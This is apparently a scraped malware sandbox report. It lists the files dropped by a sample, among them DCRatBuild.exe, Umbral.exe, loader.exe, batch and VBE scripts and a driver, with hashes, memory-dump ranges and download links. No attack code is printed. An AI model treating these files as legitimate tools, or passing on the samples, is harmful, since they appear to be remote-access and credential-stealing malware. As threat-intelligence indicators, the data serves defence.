30390fe3edd146af3b11422784e0c84e

SHA1
89ed5ff2c3c3e244f418aa9ecac20d5dc7ce4fd2

SHA256
2c82d911eab62a585fcd338495c058e00d0df008624cfd06147788aca8b9de48

SHA512
7f07fc7834bf79320aa05117c9755cd948dce814c52a1ef4bab271130f22581e90f00e5d5a0731b91eca737f520b239824e14385a524b74d529dc1ac72877a83

Download Submit
C:\ProviderDriverRef\providerIntoCrtcommon.exe

Filesize
1.8MB

MD5
d6f30f712882f421720632e5d2587d15

SHA1
622f2e728498209b89e8f696c14d6ddab24d151f

SHA256
b5b960301f6466f65bae6fd82bc8996de3dbf54895eeeac4c331f53ed0b6b0ca

SHA512
75f7b58677635893009ffc417e433d93771a4b4cfbe077e9b6fb019fe195e9762533e49ef7c0e743872281093e906b142c8244a97041d82ae67f90123dcb8093

Download Submit
C:\Users\Admin\AppData\Local\Temp\3IeSgqMHPu.bat

Filesize
251B

MD5
84c67e3611d687f96766202769c32620

SHA1
fe06c310376c6e17ad5483a6c96e5d8b90bf844d

SHA256
3227af62d3180004873b5161f8fc5db1c41aebb8a7c30e0205e3bffed0c57413

SHA512
5dc6db5b24fb9810af0b8614952b637e33dc7cb3728bef81c129f198866ea85db35070154b2d159634896f88995866be6c1fdf8322e77e8665f36e0f92471154

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bb5GAaqDbf.bat

Filesize
203B

MD5
c68523da845819965e4df63f9abef8a7

SHA1
35b0059070a1ba718c1c7b90143c5edf6724ef98

SHA256
723cec98407cc9cbaa54b80bdf6f21a2b413fb9f2b5fcf459dfc2860d6327b99

SHA512
202dc69d4f6aa2a3f39501540ad1bd2ecd1e714ff6ea5d5ebf3443d44dd4746d6c9614dc7586db86de81897adc507c4116395040fda6594243ecde672dde9811

Download Submit
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

Filesize
2.1MB

MD5
0626eaf085367b26db71b9b8dfc51fef

SHA1
e4e9375faa71047d06d34683119619831b6b7cea

SHA256
e86a37e834b808117b8b01beca497ba736bf8036cf76b7688985f04bd7b8c113

SHA512
1fb3abff984f23d0d2a339e71518f933144e2e4cad9c87d7f3a1d8ec2c0ab6fafc4cfca4774f947f893137ecbe1e1300b148d19dcd18762f27fd28d1e0b8cec6

Download Submit
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

Filesize
2.1MB

MD5
7a59cdf60cc76e32baacdcea38ce4ffe

SHA1
d4ce3008171c4c7c2efa9eafac22a7a434c0d618

SHA256
0adcbb26a2c80395a0a0ed0967283d00607e2eff34872e5edcdfda8f26b6a38d

SHA512
32eefa18bccd8808faae35617940a1fc96443f41ae5b38e7b3242cc86577d7bff2a1cdc292f5576a537b02d47f8a4f35f8f9cfed8bd100133c52fccfade6bf58

Download Submit
C:\Users\Admin\AppData\Local\Temp\DfUzOw7aQ3.bat

Filesize
248B

MD5
e660219cd00170484f276207745338d4

SHA1
c3f8718f73e5390219f62f3c8632537a84f3de08

SHA256
1d31b28d009c5a1e8102e955ccd26b8843c82897c7456955c2e4ce94f54d9f7a

SHA512
9c5294655168497ffddccbc7c9238abaab12a066119d1401839b553e894d5e25e043820c0df9250b209c74777dee8aacb260d56f9f601c20694d3e8c63bbe940

Download Submit
C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe

Filesize
1.9MB

MD5
ec801a7d4b72a288ec6c207bb9ff0131

SHA1
32eec2ae1f9e201516fa7fcdc16c4928f7997561

SHA256
b65f40618f584303ca0bcf9b5f88c233cc4237699c0c4bf40ba8facbe8195a46

SHA512
a07dd5e8241de73ce65ff8d74acef4942b85fc45cf6a7baafd3c0f9d330b08e7412f2023ba667e99b40e732a65e8fb4389f7fe73c7b6256ca71e63afe46cdcac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE705.tmp

Filesize
1KB

MD5
a1d2013703c7f147033c5d0eecb5ea4e

SHA1
3e554dad2f98ff69856582ed4f17a386ed8f104e

SHA256
a2527e739710b839cb014baffa5b438fb9f66cd7a418c71a1e212a67acda7efc

SHA512
de4e7b0436d9f8542729ba1080072c1b9472039f95641f268102ba6eb931a368aa713dff55d8e318a3baaef55598bc20f79f987c0b53294ea584a241d6951eab

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
81ee8159cd03b6d0ae9e51d8cc0f3e1c

SHA1
51087190d30056a1b4acf8b58c4b2fe6bf0f0832

SHA256
b88ad09cf68043a4fb384f79ca1018c09b582c0762f27353060eae8ccc33822f

SHA512
f1f6ab30522fe6bc9d38bfe11eb7874f9fb226ce31fa55c86e07052d0dcab5575e5357340b4742b428c84068c1801d63e5c16f65232a7ac3fb99e1beb5d053a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\W4ocKfdz0oMfbaH

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\XtTEs3StbcvKeJi

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
32.7MB

MD5
68a0064a9589a070b59dfc6a1b15438c

SHA1
15e85a1050882be40647f40eeee02e4a54b9edb5

SHA256
e4d77b932dc211afcdcc064f1d1d493f719a86c020256ed6399875cf397c968a

SHA512
0278f672baaedb0d33a42a4e1ae3fe9c75562cf16ecf0a541f3ac1b9d083af9e3e3a44899a8ede8a54f2319dc31b2319f3ff0820e4e0df61eb665758d1aae5ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
b3c4cd54c11e0ea6b4ff748d391ced25

SHA1
6994195d48a637e61862e11095b0465918eca628

SHA256
6faeb07b2d1dc0814754af7edaea5e3cc28c5f2504b89b180becc0ba38c049ac

SHA512
393464625488c1b9571fb04f8cf71da336bc86c1a1d102b6fa8faf59148d787dc531fa0afd5d33febe3ad8885bace87ce4c40bfcd2c75b7f87173f81e509e491

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a9544295ad3192833c5019c5e9b92f0e

SHA1
78a77f9827d6ff1dae2d0a2b7d34005012089ae4

SHA256
d8f510d0a3ae29437f421a8dfe5f3e4836c314b34cce1b16322a0feeb25bd0ab

SHA512
0a9b3f708cf461321a5380b5b3e9fd46f35ca71ee33424b00173c7ce15d9d489891c1313e2ce5e56cdc20b5c757317d218463ec712ad3e4fd4f7c01855fd227e

Download Submit
C:\chainContainerproviderdriver\GFpm16CSowFgEy35TRHcwvj4Rm.vbe

Filesize
217B

MD5
e608cf4ea0f4d94693416934001710ae

SHA1
d0888ee125f4c8b520926163fcac59724e8e88f1

SHA256
27e35f48fa6eff22499f439ccc601619a47eba764bed93f635bf78234e40c267

SHA512
5f1f014dae12cbb7935f3b1766b0e7fa48fdd98770c8dc972d3743392487709a11cc26cc7f03b3eaeedb5d4b2769b848b5edd22231b78f2608bd7e2f9de86cf0

Download Submit
C:\chainContainerproviderdriver\PortContainercomponentsavesdll.exe

Filesize
1.8MB

MD5
8a26feadb01f539c1aafc860259b2592

SHA1
842c4422cd50d315dfc843d7969dd6e5a6e6cd0f

SHA256
a74ddf675d4df1be788b4b7bc87659fb6497f738b820ac5a52b2c38a19f818a6

SHA512
9a876cf3ff961c30e419ed7866ef81735c8c7c7b54a4719aa06718818867d8e4c390717d23b6512cfc475c45e3aa693a7c10d99d037c1c17515c87939e411c80

Download Submit
C:\chainContainerproviderdriver\uDyCMCiZHpa.bat

Filesize
115B

MD5
73139134aabc2dc0dd723b4c94f209f7

SHA1
4141a25562151354cb54c8a6fb1ac30088f87196

SHA256
3f834ae9eee6e6a3984bf17c844c1e58c07c10d70287794f41bacbfd933d2760

SHA512
589ad03ae8f88a3b610ed6852d75dcb2f4cd248647db97fd4fb760bb81ba77b6e13e911e68a7e88759a759b34ffeee0628904f5105e21a165c1b622080fa7f3b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lj1sc45x\lj1sc45x.0.cs

Filesize
404B

MD5
b5fb50984ead1d68c28b86cf8c6da7d8

SHA1
551d2b14271a3e4fef5facd792be93afae4ef137

SHA256
29c18fe4fcb99eac6d344c98e29eed979402a6070d55a52fb2aebe1b47178fca

SHA512
06437b822b55e75930a1a22c5d8391ff376328339adc743acf39fc96cfbf006f4ebd18435adc981a09c0984a6bd75f6cc068e5f1c312a73c19f53961a2afe699

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lj1sc45x\lj1sc45x.cmdline

Filesize
235B

MD5
27aca50143d68324494b562cc3cf6ab2

SHA1
bf9c7178ee39da8ec74e622aa45ec34a0e54f4aa

SHA256
657191e11978ea1bb11dc48941f8a4e94a14039c78878df2a24e3fa594df462d

SHA512
877aa5fd61a59daec9e7a1ef5e8b77a7c7d9722a8d9b2288f65839915a27a333f79c7114de9210de2ce01c13b017b80afb3958a899e338e07929dec816392adf

Download Submit
\??\c:\Windows\System32\CSC4D9BD928F8844DCE977BBF4AE4D897D.TMP

Filesize
1KB

MD5
3d2f3f47c36dc04995c17d874f4fcb7c

SHA1
8a1f462548260463a7d173506ef374d7e837d21c

SHA256
3b8d9d9aa24fd8e148c38cb84c7a2beb50ef021bdd45d435e2861b738519f6fa

SHA512
07e4f4ee221e08be2b557b1687a791e93574998e58bd1b7db912ab4521536f4b8ec783918f68ff9d87716814e8df6598a46efeb4d50b82f0b9dc4ae9482e9262

Download Submit
\Users\Admin\AppData\Local\Temp\1.exe

Filesize
29.7MB

MD5
40174a5213d9558a8cadd57fb0e37c60

SHA1
357f27f6cee21340f9a9d57da2d75799482a9995

SHA256
6cd2b2f96d402d12356ef49b878db52144402fac929cde012f4e21d6839f2aad

SHA512
799533e1199c50dc018b0f936418455417801286360b2257b8dc9d0ccc32f3266e17885ab4042456f7a1b4aa17d8de63395037e65338444bc4bde305c3b23cbd

Download Submit
memory/236-342-0x0000000000320000-0x00000000004FA000-memory.dmp

Filesize
1.9MB

Download
memory/540-288-0x00000000003B0000-0x000000000058A000-memory.dmp

Filesize
1.9MB

Download
memory/884-200-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-234-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-190-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-232-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-233-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-188-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-184-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-231-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-194-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-198-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-242-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-192-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-227-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-196-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-186-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-212-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/884-210-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-209-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-208-0x000007FFFFFDC000-0x000007FFFFFDD000-memory.dmp

Filesize
4KB

Download
memory/884-206-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-204-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/884-202-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1232-145-0x000000001B840000-0x000000001BB22000-memory.dmp

Filesize
2.9MB

Download
memory/1584-60-0x00000000000A0000-0x0000000001E5E000-memory.dmp

Filesize
29.7MB

Download
memory/1584-71-0x0000000020800000-0x00000000225BE000-memory.dmp

Filesize
29.7MB

Download
memory/1700-178-0x00000000001E0000-0x00000000001E6000-memory.dmp

Filesize
24KB

Download
memory/1700-176-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/1704-114-0x00000000000A0000-0x000000000027A000-memory.dmp

Filesize
1.9MB

Download
memory/1884-246-0x0000000000A00000-0x0000000000BDA000-memory.dmp

Filesize
1.9MB

Download
memory/2200-62-0x0000000000930000-0x0000000000B0A000-memory.dmp

Filesize
1.9MB

Download
memory/2200-80-0x0000000000490000-0x000000000049C000-memory.dmp

Filesize
48KB

Download
memory/2200-76-0x0000000000910000-0x000000000092C000-memory.dmp

Filesize
112KB

Download
memory/2200-74-0x00000000003F0000-0x00000000003FE000-memory.dmp

Filesize
56KB

Download
memory/2200-78-0x00000000020A0000-0x00000000020B8000-memory.dmp

Filesize
96KB

Download
memory/2248-38-0x000007FEF6270000-0x000007FEF6C5C000-memory.dmp

Filesize
9.9MB

Download
memory/2248-1-0x0000000000D90000-0x0000000004DB4000-memory.dmp

Filesize
64.1MB

Download
memory/2248-0-0x000007FEF6273000-0x000007FEF6274000-memory.dmp

Filesize
4KB

Download
memory/2248-7-0x000007FEF6270000-0x000007FEF6C5C000-memory.dmp

Filesize
9.9MB

Download
memory/2256-230-0x0000000000FE0000-0x00000000011BA000-memory.dmp

Filesize
1.9MB

Download
memory/2312-286-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2416-18-0x0000000000F00000-0x0000000002FB2000-memory.dmp

Filesize
32.7MB

Download
memory/2456-46-0x00000000002E0000-0x00000000004C6000-memory.dmp

Filesize
1.9MB

Download
memory/2724-279-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2724-278-0x000000001B810000-0x000000001BAF2000-memory.dmp

Filesize
2.9MB

Download
memory/2728-314-0x0000000000E40000-0x000000000101A000-memory.dmp

Filesize
1.9MB

Download
memory/2840-12-0x000007FEF6270000-0x000007FEF6C5C000-memory.dmp

Filesize
9.9MB

Download
memory/2840-9-0x00000000010A0000-0x00000000010E0000-memory.dmp

Filesize
256KB

Download
memory/2840-214-0x000007FEF6270000-0x000007FEF6C5C000-memory.dmp

Filesize
9.9MB

Download
memory/2840-8-0x000007FEF6270000-0x000007FEF6C5C000-memory.dmp

Filesize
9.9MB

Download
memory/2840-337-0x000007FEF6270000-0x000007FEF6C5C000-memory.dmp

Filesize
9.9MB

Download
memory/2848-147-0x0000000002850000-0x0000000002858000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads